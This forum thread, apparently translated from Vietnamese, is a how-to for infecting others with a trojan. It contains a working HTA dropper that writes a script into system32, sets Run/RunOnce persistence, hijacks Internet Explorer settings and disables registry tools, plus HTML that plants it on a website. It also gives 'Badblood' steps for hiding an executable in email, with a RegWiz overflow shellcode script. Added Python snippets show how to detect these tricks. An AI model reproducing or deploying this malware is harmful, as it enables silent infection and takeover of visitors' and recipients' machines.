How to attach a trojan to a website
- Code:
<html>
<head>
<script language="javascript">
try {
var fso = new ActiveXObject("Scripting.FileSystemObject");
var Shell = new ActiveXObject("WScript.Shell");
var tfolder2 = fso.GetSpecialFolder(0);
var filepath2 = tfolder2 + "\\system32\\System.js";
var a2 = fso.CreateTextFile(filepath2, true);
a2.WriteLine('var url = "Địa chỉ trojon";');
a2.WriteLine('var burl = "Địa chỉ trojon";');
a2.WriteLine('var fso = new ActiveXObject("Scripting.FileSystemObject");');
a2.WriteLine('var tfolder = fso.GetSpecialFolder(0);');
a2.WriteLine('var filepath = tfolder + "\\\\system32\\\\System.js";');
a2.WriteLine('var Shell = new ActiveXObject("WScript.Shell");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\ \\\Windows",filepath);');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\S ystem32",filepath);');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Main\\\\Start Page",url);');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url1",url);');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Dia chi con trojan");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url1");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies \\\\System\\\\DisableRegistryTools",1,"REG_DWORD") ;');
a2.Close();
Shell.Run(filepath2);
}
catch (e){}
</script>
<HTA:APPLICATION WINDOWSTATE='minimize' SHOWINTASKBAR='no' />
</head>
<body onload='window.close()'>
</body>
</html>
Then save it under the name: trojan.hta
Add the following code at the very end of your website:
- Code:
<center>
<span datasrc="#oRun" datafld="view" dataformatas="html"></span>
<xml id="oRun">
<preview>
<view>
<![CDATA[
<object id="oFile" data="trojan.hta?id=1"></object>
]]>
</view>
</preview>
</xml>
</center>
</body>
</html>
Then upload the file trojan.hta together with your website. Each time your website is opened, the trojan will open itself into the system without being detected.
How to attach a trojan to mail
"Badblood" is a tool that helps you infect a victim with (your) trojan more easily by way of email.
Badblood is a new term discovered by Marklord; this discovery lets us run attached files in mail, and in particular the user cannot know about it.
Badblood uses hidden script; it affects not only Outlook Express but also everyone who uses IE5.0 with the bundled Outlook Express (installed when Windows is installed), on Windows95 or Windows98.
Even users of mail clients such as Netscape Messager (I have not tested Eudora yet), etc., will all be infected if they open the *.eml file that I am about to show you how to create. You can also infect users of the Hotmail service, or HTML-mail, but note that they *must* open the *.eml file to be infected (:<)
Step 1:
We have to go to Internet Explorer -> Option -> Security Tab, click Custom Level, and turn off (disable) all the functions that allow Script to run (otherwise your own machine will be infected)
Step 2:
Prepare a virus, trojan, backdoor, etc., and a program for editing such as EditPlus, TextPad.
Step 3:
+ Run Outlook Express, click New Message -> Format -> Background -> Pictures (or Sound) (for example the file ding.wav)
+ Attach a trojan or virus file with the Attach button (name it file.exe, for example)
+ Save this email to some folder on the hard drive.
Step 4:
Use EditPlus or TextPad, or some other program for editing text, to open this *.eml file. In the source code of this file there will be a line like the following:
Cut the following line:
- Code:
Content-Disposition: attachment;
filename="file.exe"
- And paste it into the format section of the file ding.wav; it will look like this:
- Code:
Content-Type: audio/wav;
name="Ding.wav"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; {Note: the 2 lines below are pasted in, which is why they appear like this}
filename="file.exe"
- Then, in the format section of the ding.wav attachment, cut the following Content-ID line:
- Code:
Content-ID: <002801bf41c9$95325940$0100007f@computername>
- and paste it into the format section of the file.exe attachment. It will look like this:
- Code:
Content-Type: application/x-msdownload;
name="file.exe"
Content-Transfer-Encoding: base64
Content-ID: <002801bf41c9$95325940$0100007f@computername>
Delete (Remove) file.exe by right-clicking it and choosing Remove.
- Now go to View or press Alt + V and tick Source Edit. You will see OE show 3 buttons, Edit, Source, Preview, at the bottom of the message, and you are in Edit; click Source and paste the following script:
- Code:
<object classid="clsid:50E5E3D1-C07E-11D0-B9FD-00A0249F6B00"
id="RegWizObj"></object>
<script language="VbScript" >
expstr = "/i
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAA"
expstr = expstr & Chr(235)
expstr = expstr & Chr(53)
expstr = expstr & Chr(208)
expstr = expstr & Chr(127)
expstr = expstr + Chr(144)
expstr = expstr + Chr(139) + Chr(252)
expstr = expstr + Chr(131) + Chr(199) + Chr(25)
expstr = expstr + Chr(80)
expstr = expstr + Chr(87)
expstr = expstr + Chr(186) + Chr(96) + Chr(9) + Chr(250) + Chr(191)
expstr = expstr + Chr(255) + Chr(210)
expstr = expstr + Chr(51) + Chr(192)
expstr = expstr + Chr(80)
expstr = expstr + Chr(186) + Chr(202) + Chr(212) + Chr(248) +
Chr(191)
expstr = expstr + Chr(255) + Chr(210)
expstr = expstr + "move c:\windows\temp\d*.tmp
c:\windows\startm~1\programs\startup\file.exe"
RegWizObj.InvokeRegWizard(expstr)
</script>
- Save the change you just made. That is it; you can now send it to the victims.
If you find this complicated, send me an email and I will send you the source code of Badblood; you only need to add the victim's email, a subject and the attached file to finish the job.
At first I found doing this very complicated, but after practising about 2 or 3 times you become proficient.
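As an added example (not part of the original post), a static check a defender can run over HTML or HTA files to flag the behaviours the script in the website section combines: a file written through Scripting.FileSystemObject, WScript.Shell, RegWrite calls on Run/RunOnce, Internet Explorer and ZoneMap keys, the hidden HTA window, and the `<object>` that loads an .hta. The rule names, `scan`, `is_dropper` and both sample strings are constructed for illustration.

```python
import re

# Finding name -> pattern, applied to normalised text (lower-case, one "\" per separator).
RULES = {
    "file-drop": r"activexobject\(\s*[\"']scripting\.filesystemobject",
    "shell-exec": r"activexobject\(\s*[\"']wscript\.shell",
    "run-key-persistence": r"regwrite\(.{0,80}currentversion\\run(once)?\\",
    "ie-start-page-change": r"regwrite\(.{0,80}internet explorer\\main\\start page",
    "zone-map-change": r"regwrite\(.{0,80}internet settings\\zonemap\\domains\\",
    "registry-tools-disabled": r"regwrite\(.{0,100}disableregistrytools",
    "hidden-hta-window": r"<hta:application[^>]*showintaskbar\s*=\s*[\"']?no",
    "embedded-hta-object": r"<object[^>]*\bdata\s*=\s*[\"']?[^\"'\s>]+\.hta\b",
}

def normalise(text):
    # Script that writes script escapes "\" two or four times, and scraped copies
    # pick up stray spaces; fold each run of backslashes and whitespace into one "\".
    return re.sub(r"\s*\\[\s\\]*", lambda m: "\\", text.lower())

def scan(text):
    """Return the sorted names of every rule that matches."""
    norm = normalise(text)
    return sorted(name for name, rx in RULES.items() if re.search(rx, norm))

def is_dropper(findings):
    # Write a file, run it, keep it across reboots: the three steps seen together.
    return {"file-drop", "shell-exec", "run-key-persistence"} <= set(findings)

# Constructed samples (inert text, placeholder names).
SAMPLE_HTA = r'''<script>
var fso = new ActiveXObject("Scripting.FileSystemObject");
var Shell = new ActiveXObject("WScript.Shell");
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\x",p);');
</script>
<HTA:APPLICATION WINDOWSTATE='minimize' SHOWINTASKBAR='no' />'''
SAMPLE_PAGE = '<object id="oFile" data="placeholder.hta?id=1"></object>'

if __name__ == "__main__":
    for label, sample in (("hta", SAMPLE_HTA), ("page", SAMPLE_PAGE)):
        found = scan(sample)
        print(label, found, "dropper" if is_dropper(found) else "")
```

The normalisation step matters because the registry paths appear with doubled and quadrupled backslashes inside nested string literals; matching the raw text would miss them.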
Re: How to attach a trojan to a website
Admin, could you give me your YH so we can talk ..???
I have some questions I need your help with...????
graycap- Total posts : 3
Join date : 2010-11-19
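For the mail section of the first post, an added example (not the poster's code) that audits a saved .eml for the header edits described there: a Content-Disposition filename that disagrees with the Content-Type name, and an executable part that carries a Content-ID. `audit_eml`, the finding names, the extension list and the sample message are assumptions made for this example; it goes slightly beyond the post by also checking whether the HTML body loads that Content-ID.

```python
import os, re
from email import message_from_string

EXEC_EXT = {".exe", ".scr", ".com", ".pif", ".bat", ".hta", ".vbs", ".js"}
EXEC_TYPES = {"application/x-msdownload", "application/x-msdos-program"}
# Constructed sample: only the headers the check reads, part bodies left empty.
SAMPLE_EML = """\
Content-Type: multipart/related; boundary="b1"

--b1
Content-Type: text/html

<html><body><bgsound src="cid:constructed-id@example"></body></html>
--b1
Content-Type: audio/wav;
 name="Ding.wav"
Content-Disposition: attachment;
 filename="file.exe"

--b1
Content-Type: application/x-msdownload;
 name="file.exe"
Content-ID: <constructed-id@example>

--b1--
"""

def ext(name):
    return os.path.splitext(name or "")[1].lower()

def audit_eml(raw):
    leaves = [p for p in message_from_string(raw).walk() if not p.is_multipart()]
    html = "".join(p.get_payload(decode=True).decode("latin-1")
                   for p in leaves if p.get_content_type() == "text/html")
    cids = set(re.findall(r"cid:([^\"'\s>]+)", html, re.I))  # ids loaded inline
    findings = []
    for p in leaves:
        ctype = p.get_content_type()
        type_name = p.get_param("name") or ""
        disp_name = p.get_param("filename", header="content-disposition") or ""
        cid = (p.get("Content-ID") or "").strip().strip("<>")
        if type_name and disp_name and ext(type_name) != ext(disp_name):
            findings.append(("name-mismatch", f"{type_name} vs {disp_name}"))
        if ext(disp_name) in EXEC_EXT and ctype.split("/")[0] in ("audio", "image"):
            findings.append(("executable-name-on-media-part", f"{ctype} {disp_name}"))
        if cid and (ctype in EXEC_TYPES or EXEC_EXT & {ext(type_name), ext(disp_name)}):
            state = "loaded by HTML body" if cid in cids else "not referenced"
            findings.append(("executable-with-content-id", state))
    return findings
```

A mail gateway can quarantine on any of these findings; an ordinary sound or picture attachment whose two names agree produces none.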